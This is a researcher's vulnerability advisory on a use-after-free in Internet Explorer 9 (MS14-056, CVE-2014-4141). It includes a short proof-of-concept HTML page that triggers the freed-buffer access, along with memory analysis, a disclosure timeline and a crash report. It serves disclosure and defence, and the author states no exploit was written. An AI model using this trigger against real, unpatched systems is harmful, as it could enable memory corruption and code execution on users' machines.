This is a friendly warning that your web-browser does not currently protecting your privacy and/or security as well as you might want. Click on this message to see more information about the issue(s) that were detected. November 1st, 2016 MSIE 9 MSHTML CAttr­Array use-after-free

MSIE 9 MSHTML CAttr­Array use-after-free

(MS14-056, CVE-2014-4141)

Synopsis

A specially crafted web-page can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.

Known affected versions, attack vectors and mitigations

  • Microsoft Internet Explorer 9

    An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.

Repro.html <!doctype html> <script> // This Po­C attempts to exploit a use-after-free bug in Microsoft Internet // Explorer 9 // See http://blog.skylined.nl/20161101001.html for details. o­Text­Area = document.create­Element('textarea'); o­Text­Area.data­Src = 1; o­Text­Area.id = 1; o­Text­Area.inner­HTML = 1; o­Text­Area.onvolumechange = 1; o­Text­Area.style.set­Property('list-style', "url()"); // This work by Sky­Lined is licensed under a Creative Commons // Attribution-Non-Commercial 4.0 International License. </script>

Analysis

The CAttr­Array object initially allocates a CImpl­Ary buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer is copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.

Exploit

If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.

Time-line

  • April 2014: This vulnerability was found through fuzzing.
  • July 2014: This vulnerability was submitted to ZDI.
  • July 2014: ZDI reports a collision with a report by another researcher. (From the credits given by Microsoft and ZDI, I surmise that it was Peter 'corelanc0d3r' Van Eeckhoutte of Corelan who reported this issue.
  • October 2014: Microsoft release MS14-056, which addresses this issue.
  • November 2016: Details of this issue are released.
Bug­Id report: MSHTML.dll!Parse­List­Style­Property Arbitrary~FE0 AVR(3986463A)
id:             MSHTML.dll!Parse­List­Style­Property Arbitrary~FE0 AVR(3986463A)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x12D11FE0) in MSHTML.dll!Parse­List­Style­Property
note:           The exception happens in the main process. Based on this information, this is expected to be a critical security issue!
This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
© Copyright 2017 by Sky­Lined. Last updated on August 19th, 2017. Creative Commons License This work is licensed under a Creative Commons Attribution-Non‑Commercial 4.0 International License. If you find this web-site useful and would like to make a donation, you can send bitcoin to 183yyxa9s1s1f7JBp­PHPmz­Q346y91Rx5DX.